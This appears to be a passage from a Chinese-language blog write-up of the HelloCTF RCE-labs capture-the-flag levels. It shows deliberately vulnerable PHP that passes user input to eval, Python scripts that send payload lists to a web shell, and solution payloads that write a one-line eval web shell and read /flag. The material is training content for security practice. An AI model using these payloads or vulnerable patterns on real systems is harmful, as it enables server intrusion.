<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/python</span><br><span class="line"># -*- coding: UTF-8 -*-</span><br><span class="line">import requests</span><br><span class="line">url = &quot;http://192.168.61.157/?cmd=&#123;0&#125;&quot;</span><br><span class="line">print(&quot;[+]start attack!!!&quot;)</span><br><span class="line">with open(&quot;payload.txt&quot;,&quot;r&quot;) as f:</span><br><span class="line">    for i in f:</span><br><span class="line">        print(&quot;[*]&quot; + url.format(i.strip()))</span><br><span class="line">        requests.get(url.format(i.strip()))</span><br><span class="line">#检查是否攻击成功</span><br><span class="line">test = requests.get(&quot;http://192.168.61.157/1.php&quot;)</span><br><span class="line">if test.status_code == requests.codes.ok:</span><br><span class="line">    print(&quot;[*]Attack success!!!&quot;)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/python</span><br><span class="line"># -*- coding: UTF-8 -*-</span><br><span class="line">import requests</span><br><span class="line">headers = &#123;&#x27;User-Agent&#x27; : &#x27;ccc&#x27;&#125;</span><br><span class="line">url = &quot;http://xx.xxx.xx.xxx:10001/shell.php?pass=LTLT_666&amp;big_hacker_LTLT=&#123;0&#125;&quot;</span><br><span class="line">print(&quot;[+]start attack!!!&quot;)</span><br><span class="line">with open(&quot;payload.txt&quot;,&quot;r&quot;) as f:</span><br><span class="line">    for i in f:</span><br><span class="line">        print(&quot;[*]&quot; + url.format(i.strip()))</span><br><span class="line">        requests.get(url.format(i.strip()),headers=headers)</span><br></pre></td></tr></table></figure>



## 





## level17

### PHP命令执行函数

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">session_start(); </span><br><span class="line">/*</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line"># @Author: 探姬</span><br><span class="line"># @Date:   2024-08-11 14:34</span><br><span class="line"># @Repo:   github.com/ProbiusOfficial/RCE-labs</span><br><span class="line"># @email:  admin@hello-ctf.com</span><br><span class="line"># @link:   hello-ctf.com</span><br><span class="line"></span><br><span class="line">--- HelloCTF - RCE靶场 : 命令执行 - PHP命令执行函数 --- </span><br><span class="line"></span><br><span class="line">喵喵喵ww https://www.php.net/manual/zh/ref.exec.php</span><br><span class="line"></span><br><span class="line">system() 函数用于在系统权限允许的情况下执行系统命令（Windows 和 Linux 系统均可执行）。eg：system(&#x27;cat /etc/passwd&#x27;);</span><br><span class="line">exec() 函数可以执行系统命令，但不会直接输出结果，而是将结果保存到数组中。eg：exec(&#x27;cat /etc/passwd&#x27;, $result); print_r($result);</span><br><span class="line">shell_exec() 函数执行系统命令，但返回一个字符串类型的变量来存储系统命令的执行结果。eg：echo shell_exec(&#x27;cat /etc/passwd&#x27;);</span><br><span class="line">passthru() 函数执行系统命令并将执行结果输出到页面中，支持二进制数据。eg：passthru(&#x27;cat /etc/passwd&#x27;);</span><br><span class="line">popen() 函数执行系统命令，但返回一个资源类型的变量，需要配合 fread() 函数读取结果。eg：$result = popen(&#x27;cat /etc/passwd&#x27;, &#x27;r&#x27;); echo fread($result, 100);</span><br><span class="line">反引号 用于执行系统命令，返回一个字符串类型的变量来存储命令的执行结果。eg：echo \cat /etc/passwd`;`</span><br><span class="line"></span><br><span class="line">在该关卡中，你将会从能够执行系统命令的PHP函数中抽取一个，你需要填充函数的内容来执行某些系统命令以获取flag（tip:flag存储在 /flag 中,当然你也可以尝试其他方法）。</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">*/</span><br><span class="line">function hello_ctf($function, $content)&#123;</span><br><span class="line">    if($function == &#x27;``&#x27;)&#123;</span><br><span class="line">        $code = &#x27;`&#x27;.$content.&#x27;`&#x27;;</span><br><span class="line">        echo &quot;Your Code: $code &lt;br&gt;&quot;;</span><br><span class="line">        eval(&quot;echo $code&quot;);</span><br><span class="line">    &#125;else</span><br><span class="line">    &#123;</span><br><span class="line">        $code = $function . &quot;(&quot; . $content . &quot;);&quot;;</span><br><span class="line">        echo &quot;Your Code: $code &lt;br&gt;&quot;;</span><br><span class="line">        eval($code);</span><br><span class="line">    &#125; </span><br><span class="line">    </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function get_fun()&#123;</span><br><span class="line"></span><br><span class="line">    $func_list = [&#x27;system&#x27;, &#x27;exec&#x27;, &#x27;shell_exec&#x27;, &#x27;passthru&#x27;, &#x27;popen&#x27;,&#x27;``&#x27;];</span><br><span class="line"></span><br><span class="line">    if (!isset($_SESSION[&#x27;random_func&#x27;])) &#123;</span><br><span class="line">        $_SESSION[&#x27;random_func&#x27;] = $func_list[array_rand($func_list)];</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    $random_func = $_SESSION[&#x27;random_func&#x27;];</span><br><span class="line"></span><br><span class="line">    $url_fucn = preg_replace(&#x27;/_/&#x27;, &#x27;-&#x27;, $_SESSION[&#x27;random_func&#x27;]);</span><br><span class="line"></span><br><span class="line">    echo $random_func == &#x27;``&#x27; ? &quot;获得隐藏运算符: 执行运算符 ，去 https://www.php.net/manual/zh/language.operators.execution.php 详情。&lt;br&gt;&quot; : &quot;获得新的函数: $random_func ，去 https://www.php.net/manual/zh/function.&quot;.$url_fucn.&quot;.php 查看函数详情。&lt;br&gt;&quot;;</span><br><span class="line"></span><br><span class="line">    return $_SESSION[&#x27;random_func&#x27;];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function start($act)&#123;</span><br><span class="line"></span><br><span class="line">    $random_func = get_fun();</span><br><span class="line">    </span><br><span class="line">    if($act == &quot;r&quot;)&#123; /* 通过发送GET ?action=r 的方式可以重置当前选中的函数 —— 或者你可以自己想办法可控它x */</span><br><span class="line">        session_unset();</span><br><span class="line">        session_destroy(); </span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    if ($act == &quot;submit&quot;)&#123;</span><br><span class="line">        $user_content = $_POST[&#x27;content&#x27;]; </span><br><span class="line">        hello_ctf($random_func, $user_content);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">isset($_GET[&#x27;action&#x27;]) ? start($_GET[&#x27;action&#x27;]) : &#x27;&#x27;;</span><br><span class="line"></span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

| 命令                                    | 使用                                                  |                          |
| :-------------------------------------- | :---------------------------------------------------- | :----------------------- |
| system                                  | system('ls')                                          |                          |
| exec()                                  | exec('ls', $result); print_r($result);                | 无输出，结果保存在数组中 |
| shell_exec()                            | echo shell_exec('ls');                                | 无输出，返回字符串       |
| ``           | echo \cat /etc/passwd`;` | 同上                                                  |                          |
| passthru()                              | passthru('ls');                                       | 同ststem                 |
| popen()                                 | $result = popen('ls', 'r'); echo fread($result, 100); | 配合fread读取结果        |

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Get</span><br><span class="line">?action=submit</span><br><span class="line">POST</span><br><span class="line">content=&quot;cat /flag&gt;1.txt&quot;,&quot;r&quot;</span><br><span class="line">访问1.txt</span><br></pre></td></tr></table></figure>





## level19

## 文件写入导致的RCE

[PHP: file_put_contents - Manual](https://www.php.net/manual/zh/function.file-put-contents.php)

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">/*</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line"># @Author: 探姬</span><br><span class="line"># @Date:   2024-08-11 14:34</span><br><span class="line"># @Repo:   github.com/ProbiusOfficial/RCE-labs</span><br><span class="line"># @email:  admin@hello-ctf.com</span><br><span class="line"># @link:   hello-ctf.com</span><br><span class="line"></span><br><span class="line">--- HelloCTF - RCE靶场 : 文件写入导致的RCE --- </span><br><span class="line"></span><br><span class="line">https://www.php.net/manual/zh/function.file-put-contents.php</span><br><span class="line"></span><br><span class="line">参考可以写入的内容：</span><br><span class="line">&lt;?php @eval($_POST[&#x27;a&#x27;]); ?&gt;</span><br><span class="line"></span><br><span class="line">*/</span><br><span class="line"></span><br><span class="line">function helloctf($code)&#123;</span><br><span class="line">    $code = &quot;file_put_contents(&quot;.$code.&quot;);&quot;;</span><br><span class="line">    eval($code);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">isset($_GET[&#x27;c&#x27;]) ? helloctf($_GET[&#x27;c&#x27;]) : &#x27;&#x27;;</span><br><span class="line"></span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?c=&#x27;shell.php&#x27;,&#x27;&lt;?php @eval($_POST[&#x27;a&#x27;]); ?&gt;&#x27;</span><br><span class="line">蚁剑连接</span><br></pre></td></tr></table></figure>





## level20

### 文件上传

上传一个写入一句话木马的php文件

蚁剑连接

</article><!-- lincense--><div class="license-wrapper"><p> <span>Author:  </span><a href="http://syifna.github.io">syifna</a></p><p> <span>Link:  </span><a href="http://syifna.github.io/2025/05/19/RCE-labs/">http://syifna.github.io/2025/05/19/RCE-labs/</a></p><p> <span>Copyright:  </span><span>All articles in this blog are licensed under <a rel="license noopener" target="_blank" href="https://creativecommons.org/licenses/by-nc-nd/3.0">CC BY-NC-SA 3.0</a> unless stating additionally.</span></p></div><div class="post-paginator"><a class="nextSlogan" href="/2025/05/19/MD5/" title="MD5"><span>NextPost ></span><br><span class="nextTitle">MD5</span></a><div class="clear"></div></div><div id="comment"></div></section></article><footer id="cxo-footer-outer"><div id="cxo-footer-inner"><p class="footer-container"><span>Site by </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span> | theme </span><a target="_blank" rel="noopener" href="https://github.com/Longlongyu/hexo-theme-Cxo"><span>Cxo</span></a></p><i class="fa fa-user"> </i><span id="busuanzi_value_site_uv"></span><span> | </span><i class="fa fa-eye"> </i><span id="busuanzi_value_site_pv"></span></div></footer><!-- catelog--><div class="toc-wrapper" style="top: 70vh;"><div class="toc-catalog"><i class="fa fa-list"> </i><span>CATALOG</span></div><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#level2"><span class="toc-number">1.</span> <span class="toc-text">level2</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#PHP%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E5%87%BD%E6%95%B0"><span class="toc-number">1.1.</span> <span class="toc-text">PHP代码执行函数</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link"><span class="toc-number">2.</span> <span class="toc-text"></span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level6"><span class="toc-number">3.</span> <span class="toc-text">level6</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%80%9A%E9%85%8D%E7%AC%A6%E5%8C%B9%E9%85%8D%E7%BB%95%E8%BF%87"><span class="toc-number">3.1.</span> <span class="toc-text">通配符匹配绕过</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level7"><span class="toc-number">4.</span> <span class="toc-text">level7</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%A9%BA%E6%A0%BC%E8%BF%87%E6%BB%A4"><span class="toc-number">4.1.</span> <span class="toc-text">空格过滤</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level8"><span class="toc-number">5.</span> <span class="toc-text">level8</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E6%8F%8F%E8%BF%B0%E5%92%8C%E9%87%8D%E5%AE%9A%E5%90%91"><span class="toc-number">5.1.</span> <span class="toc-text">文件描述和重定向</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%86%E9%9A%94%E7%AC%A6"><span class="toc-number">5.1.1.</span> <span class="toc-text">分隔符</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level9"><span class="toc-number">6.</span> <span class="toc-text">level9</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#bash%E7%BB%88%E7%AB%AF%E7%9A%84%E6%97%A0%E5%AD%97%E6%AF%8D%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C-%E5%85%AB%E8%BF%9B%E5%88%B6%E8%BD%AC%E4%B9%89"><span class="toc-number">6.1.</span> <span class="toc-text">bash终端的无字母命令执行_八进制转义</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level10"><span class="toc-number">7.</span> <span class="toc-text">level10</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#bash%E7%BB%88%E7%AB%AF%E7%9A%84%E6%97%A0%E5%AD%97%E6%AF%8D%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C-%E4%BA%8C%E8%BF%9B%E5%88%B6%E6%95%B4%E6%95%B0%E6%9B%BF%E6%8D%A2"><span class="toc-number">7.1.</span> <span class="toc-text">bash终端的无字母命令执行_二进制整数替换</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level11"><span class="toc-number">8.</span> <span class="toc-text">level11</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#bash%E7%BB%88%E7%AB%AF%E7%9A%84%E6%97%A0%E5%AD%97%E6%AF%8D%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C-%E6%95%B0%E5%AD%971%E7%9A%84%E7%89%B9%E6%AE%8A%E5%8F%98%E9%87%8F%E6%9B%BF%E6%8D%A2"><span class="toc-number">8.1.</span> <span class="toc-text">bash终端的无字母命令执行_数字1的特殊变量替换</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level13"><span class="toc-number">9.</span> <span class="toc-text">level13</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level14"><span class="toc-number">10.</span> <span class="toc-text">level14</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#7%E5%AD%97%E7%AC%A6RCE"><span class="toc-number">10.1.</span> <span class="toc-text">7字符RCE</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#level15"><span class="toc-number">11.</span> <span class="toc-text">level15</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#5%E5%AD%97%E7%AC%A6rce"><span class="toc-number">11.1.</span> <span class="toc-text">5字符rce</span></a></li></ol></li></ol></div><!-- top--><i class="fa fa-arrow-up close" id="go-up" aria-hidden="true"></i></body></html>